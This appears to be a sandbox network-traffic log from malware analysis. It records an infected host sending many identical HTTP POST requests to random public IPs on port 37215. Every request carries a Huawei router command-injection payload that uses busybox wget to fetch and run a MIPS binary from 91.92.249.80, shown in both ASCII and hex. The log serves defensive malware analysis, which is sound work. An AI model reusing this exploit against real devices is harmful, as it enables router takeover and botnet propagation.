                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1423192.168.2.2347878197.233.198.4737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472317934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1424192.168.2.2351802197.207.242.15437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472328901 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1425192.168.2.2345924197.65.231.8637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472337008 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1426192.168.2.2349300197.179.202.21137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472438097 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1427192.168.2.234987641.11.48.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472435951 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1428192.168.2.2340682197.79.30.3437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472460032 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1429192.168.2.2349582157.148.5.4537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472462893 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1430192.168.2.234142019.41.20.437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472595930 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1431192.168.2.2333876197.158.14.5637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472599030 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1432192.168.2.2344930157.52.208.5537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472606897 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1433192.168.2.2352610157.0.58.10337215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.472698927 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
